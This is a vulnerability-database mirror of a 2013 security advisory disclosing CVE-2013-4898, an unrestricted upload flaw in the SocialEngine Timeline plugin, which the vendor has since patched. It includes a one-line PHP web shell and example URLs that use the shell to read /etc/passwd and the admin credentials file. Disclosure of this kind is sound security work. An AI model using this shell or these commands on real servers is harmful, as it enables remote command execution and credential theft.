Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormWesley Henrique LeitePACKETSTORM:122702
HistoryAug 07, 2013 - 12:00 a.m.

SocialEngine 4.5 Shell Upload

2013-08-0700:00:00
Wesley Henrique Leite
packetstormsecurity.com
18

EPSS

0.006

Percentile

79.5%

JSON
`+ INTRODUCTION  
-------------------------------------------------------------  
The plugin has the objective give you a better visual for the user  
profile, allowed the addition of cover image keeping the layout closest  
to the style of modern social networks, among other features.  
  
  
+ DESCRIPTION OF VULNERABILITY  
-------------------------------------------------------------  
Logged into the system, enter on profile page of your user. [my profile]  
  
http://example.com/index.php/profile/[profile-name]  
  
>> Click "Change Cover"  
  
>> Click "Upload Cover"  
  
select the file "*.php" you want to send.  
  
//### Example PHP file to send "inject.php" ###  
<?php echo system("$_GET['cmd']"); ?>  
//###  
  
After selecting the file upload, this will be sent to an area temporarily,  
the system detects that the format is not valid, but doesnΒ’t remove,  
allowing access later.  
  
an error message is displayed on the screen.  
  
[ File "/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php"  
is not an image or does not exist ]  
  
  
+ ACCESS  
-------------------------------------------------------------  
/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php  
  
The important thing is the structure of public forward, it will give  
us access to our archive.  
  
account operation system  
http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd  
  
account credentials admin application  
http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php  
  
-------------------------------------------------------------  
+ Discovered by: Wesley Henrique Leite ( wesleyhenrique (Β΄) gmail (Β΄) com )  
+ Software: SocialEngine 4.5  
+ Plugin Link: http://webhive.com.ua/store/product.php?id_product=46  
+ Plugin Name+Version : Timeline 4.2.5p9  
+ CVE-2013-4898  
+ REPORTED TO VENDOR JUL 17 2013  
+ PATCH RELEASED JUL 25 2013  
-------------------------------------------------------------  
  
--   
Wesley Henrique Leite  
`

Related

cvelist 1
exploitpack 1
exploitdb 1
nvd 1
prion 1
zdt 1
cve 1
securityvulns 1
cvelist
cvelist
CVE-2013-4898
2014-01-29 18:00:00
exploitpack
exploitpack
SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload
2013-08-02 00:00:00
exploitdb
exploitdb
SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload
2013-08-02 00:00:00
nvd
nvd
CVE-2013-4898
2014-01-29 18:55:26
prion
prion
Unrestricted file upload
2014-01-29 18:55:00
zdt
zdt
SocialEngine 4.5 Shell Upload Vulnerability
2013-08-07 00:00:00
cve
cve
CVE-2013-4898
2014-01-29 18:55:26
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-09-09 00:00:00

EPSS

0.006

Percentile

79.5%

JSON
Related for PACKETSTORM:122702
cvelist1exploitpack1exploitdb1nvd1prion1zdt1cve1securityvulns1